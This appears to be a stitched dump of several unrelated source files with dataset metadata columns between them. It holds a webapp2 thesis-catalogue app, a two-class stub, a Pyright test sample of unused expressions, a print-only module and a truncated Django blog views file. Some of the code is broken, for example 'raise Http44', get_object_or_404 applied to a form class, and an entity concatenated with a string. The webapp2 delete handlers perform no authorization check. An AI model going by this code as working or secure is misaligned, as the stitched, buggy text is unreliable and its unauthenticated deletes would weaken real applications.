template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
student = Student()
student_department_temp = Department.query(Department.department_name == self.request.get('student_department'))
student_department_temp = student_department_temp.get()
student_department_key = student_department_temp.key
student.student_fname = self.request.get('student_fname')
student.student_sname = self.request.get('student_sname')
student.student_full = student.student_fname + ' ' + student.student_sname
student.student_phone = self.request.get('student_phone')
student.student_email = self.request.get('student_email')
student.student_number = self.request.get('student_number')
student.student_graduated = int(self.request.get('student_graduated'))
student.student_department = ndb.Key('Department', student_department_key.id())
student.student_bday = self.request.get('student_bday')
student.key = ndb.Key(Student, id)
student.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'first_name':student.student_fname,
'last_name':student.student_sname,
'full_name':student.student_full,
'phone':student.student_phone,
'email':student.student_email,
'student_number':student.student_number,
'year_graduated':student.student_graduated
}
}
self.response.out.write(json.dumps(response))
class UniversityDeleteHandler(webapp2.RequestHandler):
def post(self, id):
university = University.get_by_id(id)
university.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class UniversityEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
university = University.get_by_id(id)
data = {
'links' : links,
'item' : university,
'logout_url':logout_url,
'user':user
}
template = JINJA_ENVIRONMENT.get_template('/pages/universityedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
university = University()
university.university_name = self.request.get('university_name')
university.university_initial = self.request.get('university_initial')
university.university_address = self.request.get('university_address')
university.key = ndb.Key(University, id)
university.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'university_name': university.university_name,
'university_initial': university.university_initial,
'university_address': university.university_address
}
}
self.response.out.write(json.dumps(response))
class CollegeDeleteHandler(webapp2.RequestHandler):
def post(self, id):
college = College.get_by_id(id)
college.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class CollegeEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
college = College.get_by_id(id)
depts = []
for c in college.college_departments:
department = Department.query(Department.key == c)
logging.info(department)
if department is not None:
department = department.get()
depts.append(department.department_name)
university = University.query(University.key == college.college_university)
university = university.get()
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
data = {
'links':links,
'item' : college,
'univ' : university.university_name,
'dept' : depts,
'logout_url':logout_url,
'user':user.first_name
}
for i in range(0, len(depts)):
data['college_dept_' + str(i)] = depts[i]
logging.info(data)
template = JINJA_ENVIRONMENT.get_template('/pages/collegeedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
college = College()
college_university_temp = University.query(University.university_name == self.request.get('college_university'))
college_university_temp = college_university_temp.get()
college_university_key = college_university_temp.key
department = college.college_departments
dept_temp = []
i = 0
if self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
while self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
college_dept_temp = Department.query(Department.department_name == self.request.get('college_department_' + str(i)))
college_dept_temp = college_dept_temp.get()
if college_dept_temp.key not in department:
department.append(college_dept_temp.key)
i += 1
college.college_departments = department
else:
college.college_departments = []
college.college_university = ndb.Key('University', college_university_key.id())
college.college_name = self.request.get('college_name')
college.key = ndb.Key(College, id)
college.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'college_name': college.college_name
}
}
self.response.out.write(json.dumps(response))
class DepartmentDeleteHandler(webapp2.RequestHandler):
def post(self, id):
department = Department.get_by_id(id)
dept = []
dept.append(department.key)
logging.info(dept)
college = College.query(College.college_departments.IN(dept))
college = college.get()
logging.info(college)
depts = []
depts = college.college_departments
depts.remove(department.key)
college.college_departments = depts
college.key = college.key
college.put()
department.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class DepartmentEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
department = Department.get_by_id(id)
if department.department_college is not None:
college = College.query(College.key == department.department_college)
college = college.get()
college = college.college_name
if department.department_chair is not None:
chairperson = Faculty.query(Faculty.key == department.department_chair)
chairperson = chairperson.get()
chairperson = chairperson.faculty_full
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
data = {
'links':links,
'item' : department,
'college' : college,
'chairperson':chairperson,
'logout_url':logout_url,
'user':user.first_name
}
logging.info(data)
template = JINJA_ENVIRONMENT.get_template('/pages/departmentedit.html')
self.response.write(template.render(data))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
department = Department()
department_college_temp = College.query(College.college_name == self.request.get('department_college'))
department_college_temp = department_college_temp.get()
department_college_key = department_college_temp.key
department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
department_chair_temp = department_chair_temp.get()
department_chair_key = department_chair_temp.key
department.department_college = ndb.Key('College', department_college_key.id())
department.department_name = self.request.get('department_name')
department.department_chair = ndb.Key('Faculty', department_chair_key.id())
department.key = ndb.Key(Department, id)
department.put()
college = College.query(College.key == department.department_college)
c = college.get()
logging.info(c)
collegelist = []
collegelist = c.college_departments
logging.info(collegelist)
collegelist.append(department.key)
c.college_departments = collegelist
c.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK',
'data':{
'department_name': department.department_name
}
}
self.response.out.write(json.dumps(response))
class ThesisDeleteHandler(webapp2.RequestHandler):
def post(self, id):
thesis = thesisentry.get_by_id(int(id))
thesis.key.delete()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result':'OK'
}
self.response.out.write(json.dumps(response))
class ThesisEditHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
department = Department.get_by_id(thesis.thesis_department.id())
department = department.department_name
template_values = {
'links' : links,
'id': id,
'proponents':proponents,
'adviser':adviser,
'department':department,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisedit.html')
self.response.write(template.render(template_values))
else:
self.redirect('/')
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self, id):
thesis = thesisentry()
user = User()
faculty = Faculty()
loggedin_user = users.get_current_user()
user_key = ndb.Key('User', loggedin_user.user_id())
thesis_proponents = []
i = 0
while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponents.append(None)
i += 1
logging.info(thesis_proponents)
thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
thesis_adviser_temp = thesis_adviser_temp.get()
thesis_adviser_key = thesis_adviser_temp.key
thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
thesis_department_temp = thesis_department_temp.get()
thesis_department_key = thesis_department_temp.key
thesis.thesis_author = user_key
thesis.thesis_year = self.request.get('thesis_year')
thesis.thesis_title = self.request.get('thesis_title')
thesis.thesis_abstract = self.request.get('thesis_abstract')
thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
thesis.thesis_section = self.request.get('thesis_section')
thesis.thesis_proponent = thesis_proponents
thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
thesis.key = ndb.Key(thesisentry, int(id))
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t)
thesis.thesis_tags = tags
thesis.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result': 'OK',
'data': {
'id' : thesis.key.urlsafe(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'section': thesis.thesis_section,
'author': user_key.get() + ' ' + user_key.get().last_name
}
}
self.response.out.write(json.dumps(response))
class ThesisListAll(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class ThesisListFilter(webapp2.RequestHandler):
def get(self, value):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
logging.info(value)
thesisdet = thesisentry.query(thesisentry.thesis_year == value).fetch()
selected = value
if len(thesisdet) == 0:
faculty = Faculty.get_by_id(value)
logging.info(faculty)
if faculty is not None and len(thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()) != 0:
thesisdet = thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()
selected = faculty.faculty_full
else:
university = University.get_by_id(value)
college = College.query(College.college_university == university.key)
college = college.get()
department = Department.query(Department.department_college == college.key)
department = department.get()
thesisdet = thesisentry.query(thesisentry.thesis_department == department.key).fetch()
selected = university.university_name
logout_url = users.create_logout_url('/')
link_text = 'Logout'
template_values = {
'thesis': thesisdet,
'selected': selected,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesislistfiltered.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class ThesisDetailsHandler(webapp2.RequestHandler):
def get(self, id):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
tags = thesis.thesis_tags
t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
edit_link = {}
edit_link['Edit Thesis Entry'] = '/thesis/' + id + '/edit'
template_values = {
'links': links,
'edit_link':edit_link,
'related':t,
'proponents':proponents,
'adviser':adviser,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
self.response.write(template.render(template_values))
else:
logout_url = users.create_logout_url('/')
link_text = 'Logout'
thesis = thesisentry.get_by_id(int(id))
adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
adviser = adviser.faculty_full
proponents = []
for t in thesis.thesis_proponent:
p = Student.get_by_id(t.id())
proponents.append(p.student_full)
tags = thesis.thesis_tags
t = thesisentry.query(thesisentry.thesis_tags.IN(tags)).fetch()
edit_link = {}
edit_link[''] = '#'
template_values = {
'edit_link':edit_link,
'related':t,
'proponents':proponents,
'adviser':adviser,
'thesis':thesis,
'logout_url':logout_url,
'user':user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class SearchHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Department'] = {'List':'/department/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
results = thesisentry.query(thesisentry.thesis_tags.IN(keyword)).fetch()
if len(results) == 0:
keyword = []
keyword = (self.request.get('search_keyword')).lower().split()
stud_res = Student.query(Student.student_name_portions.IN(keyword)).fetch()
keys = []
for s in stud_res:
keys.append(s.key)
results = thesisentry.query(thesisentry.thesis_proponent.IN(keys)).fetch()
logging.info(results)
search_results = {}
for r in results:
search_results[r.thesis_title] = r.key.id()
self.response.headers['Content-Type'] = 'application.json'
response = {
'result':'OK',
'data': search_results
}
self.response.out.write(json.dumps(response))
app = webapp2.WSGIApplication([
('/api/thesis', APIHandler),
('/register', RegistrationHandler),
('/login', LoginHandler),
('/home', MainPageHandler),
('/thesis/create', ThesisPageHandler),
('/faculty/create', FacultyHandler),
('/student/create', StudentHandler),
('/university/create', UniversityHandler),
('/college/create', CollegeHandler),
('/department/create', DepartmentHandler),
('/data/import', DataImportHandler),
('/setup', SetupHandler),
('/faculty/list', FacultyListHandler),
('/faculty/api', FacultyAPIHandler),
('/thesis/create/api', ThesisCreateAPI),
('/student/api', StudentsAPIHandler),
('/student/list', StudentListHandler),
('/university/api', UniversityAPIHandler),
('/university/list', UniversityListHandler),
('/college/api', CollegeAPIHandler),
('/college/list', CollegeListHandler),
('/department/api', DepartmentAPIHandler),
('/department/list', DepartmentListHandler),
('/faculty/(.*)/delete', FacultyDeleteHandler),
('/faculty/(.*)', FacultyEditHandler),
('/student/(.*)/delete', StudentDeleteHandler),
('/student/(.*)', StudentEdithandler),
('/university/(.*)/delete', UniversityDeleteHandler),
('/university/(.*)', UniversityEditHandler),
('/college/(.*)/delete', CollegeDeleteHandler),
('/college/(.*)', CollegeEditHandler),
('/department/(.*)/delete', DepartmentDeleteHandler),
('/department/(.*)', DepartmentEditHandler),
('/thesis/(.*)/delete', ThesisDeleteHandler),
('/thesis/(.*)/edit', ThesisEditHandler),
('/thesis/list/all', ThesisListAll),
('/thesis/list/(.*)', ThesisListFilter),
('/thesis/(.*)', ThesisDetailsHandler),
('/search', SearchHandler),
('/', MainPageHandler)
], debug=True)
| 35.733634
| 195
| 0.684157
| 9,347
| 79,150
| 5.604793
| 0.031989
| 0.020921
| 0.030064
| 0.026285
| 0.827651
| 0.788196
| 0.768401
| 0.760976
| 0.751813
| 0.73807
| 0
| 0.001422
| 0.155666
| 79,150
| 2,214
| 196
| 35.749774
| 0.78249
| 0.003588
| 0
| 0.742386
| 0
| 0
| 0.203794
| 0.008129
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029456
| false
| 0
| 0.004993
| 0
| 0.08637
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffa15fa894dcadf7c895526b37ec77848dd8ff27
| 125
|
py
|
Python
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 2
|
2017-04-18T18:41:44.000Z
|
2022-03-19T20:18:25.000Z
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 10
|
2021-03-30T13:50:55.000Z
|
2022-01-13T02:54:45.000Z
|
python/packages/init_import_things_in_modules/pkg/b.py
|
gregnordin/python-notes_to_self
|
6458271d585f5beabfd18577290de64b82666018
|
[
"MIT"
] | 2
|
2021-05-07T19:20:08.000Z
|
2021-11-11T20:37:57.000Z
|
class B1():
def __init__(self):
print('Class B1')
class B2():
def __init__(self):
print('Class B2')
| 15.625
| 25
| 0.544
| 16
| 125
| 3.75
| 0.4375
| 0.233333
| 0.366667
| 0.533333
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.296
| 125
| 7
| 26
| 17.857143
| 0.636364
| 0
| 0
| 0.333333
| 0
| 0
| 0.128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
443d493843ada50807333bd3023e027c0e54b8ba
| 465
|
py
|
Python
|
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
packages/pyright-internal/src/tests/samples/unusedExpression1.py
|
Jasha10/pyright
|
0ce0cfa10fe7faa41071a2cc417bb449cf8276fe
|
[
"MIT"
] | null | null | null |
# This sample tests the reportUnusedExpression diagnostic rule.
t = 1
# This should generate a diagnostic.
-4
# This should generate a diagnostic.
4j
# This should generate a diagnostic.
4j + 4
# This should generate a diagnostic.
False
# This should generate a diagnostic.
t == 1
# This should generate a diagnostic.
t != 2
# This should generate a diagnostic.
t <= t
# This should generate a diagnostic.
not t
# This should generate a diagnostic.
None
| 14.53125
| 63
| 0.735484
| 68
| 465
| 5.029412
| 0.264706
| 0.263158
| 0.473684
| 0.5
| 0.804094
| 0.804094
| 0.181287
| 0
| 0
| 0
| 0
| 0.018868
| 0.202151
| 465
| 31
| 64
| 15
| 0.902965
| 0.808602
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
448b2b2849f74b344ea3ac36e9a92c9ea244339b
| 30
|
py
|
Python
|
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 5
|
2021-04-29T21:07:18.000Z
|
2021-09-29T08:46:08.000Z
|
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | null | null | null |
tests/python/pip/subdir/testpkg/testmod.py
|
Erotemic/misc
|
6f8460a690d05e7e0117becc6cae9902cbe2cedd
|
[
"Apache-2.0"
] | 1
|
2018-04-07T12:26:21.000Z
|
2018-04-07T12:26:21.000Z
|
print('imported the testmod')
| 15
| 29
| 0.766667
| 4
| 30
| 5.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
922e44bfca7d09a7425b8c945a3d8c917b64336b
| 8,593
|
py
|
Python
|
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
src/posts/views.py
|
VinceMaku/Django-Website
|
baddfc2433ac00dd15f8d14c69a6c63d54bf3217
|
[
"MIT"
] | null | null | null |
try:
from urllib import quote_plus #python 2
except:
pass
try:
from urllib.parse import quote_plus #python 3
except:
pass
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from comments.forms import CommentForm,CommentUserForm
from comments.models import Comment,UserComment
from .forms import PostForm,PostUserForm
from .models import Post,UserPost
from accounts.forms import UserRegisterForm
def post_create(request):
if not request.user.is_authenticated():
raise Http44
form = PostForm(request.POST or None, request.FILES or None)
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
# message success
messages.success(request, "Successfully Created")
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"form": form,
}
return render(request, "post_form.html", context)
def post_detail(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
instance2= get_object_or_404(UserRegisterForm, slug=slug)
if instance.publish > timezone.now().date() or instance.draft:
if not request.user.is_staff or not request.user.is_superuser:
raise Http404
share_string = quote_plus(instance.content)
initial_data = {
"content_type": instance.get_content_type,
"object_id": instance.id
}
form = CommentForm(request.POST or None, initial=initial_data)
if form.is_valid() and request.user.is_authenticated():
c_type = form.cleaned_data.get("content_type")
content_type = ContentType.objects.get(model=c_type)
obj_id = form.cleaned_data.get('object_id')
content_data = form.cleaned_data.get("content")
parent_obj = None
try:
parent_id = int(request.POST.get("parent_id"))
except:
parent_id = None
if parent_id:
parent_qs = Comment.objects.filter(id=parent_id)
if parent_qs.exists() and parent_qs.count() == 1:
parent_obj = parent_qs.first()
new_comment, created = Comment.objects.get_or_create(
user = request.user,
content_type= content_type,
object_id = obj_id,
content = content_data,
parent = parent_obj,
)
return HttpResponseRedirect(new_comment.content_object.get_absolute_url())
comments = instance.comments
context = {
"title": instance.title,
"instance": instance,
"share_string": share_string,
"comments": comments,
"comment_form":form,
}
return render(request, "post_detail.html", context)
def post_list(request):
today = timezone.now().date()
queryset_list = Post.objects.active() #.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
queryset_list = Post.objects.all()
query = request.GET.get("q")
if query:
queryset_list = queryset_list.filter(
Q(title__icontains=query)|
Q(content__icontains=query)|
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(queryset_list, 3) # Show 25 contacts per page
page_request_var = "page"
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
queryset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
queryset = paginator.page(paginator.num_pages)
context = {
"object_list": queryset,
"title": "List",
"page_request_var": page_request_var,
"today": today,
}
return render(request, "post_list.html", context)
def post_update(request, slug=None):
instance = get_object_or_404(Post, slug=slug)
if not instance.user == request.user:
raise Http404
form = PostForm(request.POST or None, request.FILES or None, instance=instance)
if form.is_valid():
instance = form.save(commit=False)
instance.save()
messages.success(request, "<a href='#'>Item</a> Saved", extra_tags='html_safe')
return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": instance.title,
"instance": instance,
"form":form,
}
